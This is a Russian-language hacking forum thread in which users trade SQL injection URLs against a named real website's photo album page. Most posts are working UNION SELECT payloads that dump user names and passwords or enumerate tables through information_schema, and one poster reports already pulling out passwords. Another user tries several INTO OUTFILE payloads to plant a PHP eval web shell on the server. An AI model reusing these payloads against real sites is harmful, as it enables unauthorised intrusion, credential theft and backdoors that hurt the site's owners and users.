www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+'users'+limit+0,30+--+ Без результатов
Зачем users в кавычках? P.S. Сейчас составлю правильный запрос. UPD. Держи: Code: http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+users+limit+0,1--+a UPD. Вот еще: http://forum.antichat.ru/thread43966.html
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,password+from+users+limit+0,30+--+ вот вывел пароли, логины так же, все пляшет и еше ери ссилка в лс
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a Ничего не показал.
union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572 0x6162635f75736572 - подставь свой) кодировать тут - http://x3k.ru/ wp_users будет - 0x77705f7573657273 потом пишешь в запросе: база.wp_users
Шелл не заливается Пробывал так: http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,0x273c3f706870206576616c28245f4745545b20186520195d29203f3e27+INTO+OUTFILE+'1.php'+--+ http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,unhex(hex(0x273c3f706870206576616c28245f4745545b20186520195d29203f3e27))+INTO+OUTFILE+'1.php'+--+ http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,'<?php eval($_GET[‘e’]) ?>'+INTO+OUTFILE+'1.php'+--+ Очередной раз прошу помощи у старших. Поймите, ведь лучше запоминается когда на практике..
у тебя в бд нету файловых прав. Чтобы они появились в твоем случае - нужен скрипт, который обращается к бд под юзвером, у которого они есть (а я сомневаюсь, что ты найдешь такой скрипт). Д и под каким админом то ты решил зайти? Зы. проще сначала понять что такое бд, и что за язык такой, через который идет обращение к ней. А уж потом приступать к практике (взлома).
Я тебе уже давал литературу в этом посте http://forum.antichat.ru/showpost.php?p=2971891&postcount=19143 P.S. google